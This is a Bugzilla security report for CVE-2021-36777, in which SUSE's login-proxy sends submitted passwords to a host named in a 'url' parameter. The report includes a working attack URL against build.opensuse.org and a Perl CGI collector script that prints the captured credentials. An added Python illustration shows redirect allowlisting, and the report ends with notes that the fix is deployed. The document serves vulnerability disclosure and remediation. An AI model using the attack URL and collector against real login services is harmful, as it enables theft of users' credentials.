Bugzilla – Bug 1191209
VUL-0: CVE-2021-36777: login-proxy sends password to attacker-provided domain
Last modified: 2022-02-23 09:55:45 UTC
When authenticating various SUSE and openSUSE services, we use a login-proxy so that the services themselves do not get to see user passwords. Today, triggered by darix and Victor Pereira, I investigated issues about redirecting to attacker-provided URLs. I found that the login-proxy can send the credentials (filled in by users into the login form) to an attacker-provided server.

Example attack URL:
https://build.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/

On the server side is an apache (with a valid SSL cert for https) with a config line

ScriptAlias /ICSLogin/auth-up /usr/lib/cgi-bin/testpost

pointing to this script:

#!/usr/bin/perl -w
use strict;
use CGI ":standard";

print header("text/plain");
if ($ENV{REQUEST_METHOD} eq "POST") {
    print "\n\nPOST params:\n";
    foreach (param()) {
        print "$_=" . param($_) . "\n";
    }
}

Also affected:
https://hackweek.suse.com/ICSLogin/auth-up/?url=http://www.zq1.de/
https://build.suse.de/ICSLogin/auth-up/?url=http://www.zq1.de/

Not affected:
https://en.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/
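The root cause described in the report is that an attacker-controlled `url` query parameter ended up influencing where the login form posts the credentials. The defensive pattern is to keep the form's action fixed to the proxy's own endpoint and to treat `url` only as a post-login redirect target that is validated against an allowlist of hosts. The following is an added illustration of that check, not code from the login-proxy-scripts repository or from the bug's participants; the allowlist contents, the `sanitize_return_url` and `render_login_form` names, and the sample inputs are constructed for this example.

```python
import html
from urllib.parse import urlsplit, urlunsplit

# Hypothetical allowlist of services the proxy may return users to
# (constructed for this example; a real deployment would load it from config).
ALLOWED_HOSTS = {"build.opensuse.org", "hackweek.suse.com"}
DEFAULT_TARGET = "/"


def sanitize_return_url(raw, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return a safe post-login redirect target derived from the `url` parameter.

    Anything that would send the browser to a host outside the allowlist
    (absolute http/https URLs, scheme-relative //host URLs, javascript: URLs,
    userinfo tricks like https://good@evil/) collapses to `default`.
    """
    if not raw:
        return default
    # Browsers treat backslashes as forward slashes; normalise before parsing
    # so that "/\\evil.example" is seen as the scheme-relative "//evil.example".
    candidate = raw.replace("\\", "/")
    # Control characters and whitespace can smuggle a scheme past naive checks.
    if any(ord(c) < 0x20 or c in " \t\r\n" for c in candidate):
        return default
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only https to an allowlisted host,
        # with no embedded credentials and no non-default port.
        if parts.scheme != "https" or parts.hostname is None:
            return default
        try:
            port = parts.port  # raises ValueError on a malformed port
        except ValueError:
            return default
        if (parts.hostname not in allowed_hosts or parts.username
                or parts.password or port not in (None, 443)):
            return default
        return urlunsplit(("https", parts.hostname, parts.path or "/", parts.query, ""))
    # Relative target: must be a single-slash absolute path on this origin.
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, ""))


def render_login_form(requested_return_url):
    """Build the login form with a fixed action; `url` is only a validated hidden field.

    The action is never derived from request input, so credentials always go
    to the proxy's own /ICSLogin/auth-up endpoint regardless of the query string.
    """
    target = sanitize_return_url(requested_return_url)
    return (
        '<form method="post" action="/ICSLogin/auth-up">'
        f'<input type="hidden" name="url" value="{html.escape(target, quote=True)}">'
        '<input name="username">'
        '<input type="password" name="password">'
        '<button type="submit">Log in</button>'
        '</form>'
    )


if __name__ == "__main__":
    # Constructed sample inputs: the attack URL from the report and some benign ones.
    for sample in ["http://www.zq1.de/", "//www.zq1.de/", "/package/show?x=1",
                   "https://build.opensuse.org/project/list"]:
        print(f"{sample!r:45} -> {sanitize_return_url(sample)!r}")
```

The form renderer is the important half: even a perfect redirect validator does not help if the form's `action` attribute can be steered by the request, which is the flaw the commit referenced later in this bug removed.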
Please use CVE-2021-36777 for this
The appliance is not affected. The proxy code is only used on our infra. The bad part that allowed affecting the form via url param is already patched out. The general removal of the url param needs testing.
https://gitlab.suse.de/buildops/login-proxy-scripts/-/commit/d0b45f98fc74b254ee0585f26647cb6c8d2c871f by darix fixed this CVE-2021-36777
Making public. Fix is available and deployed.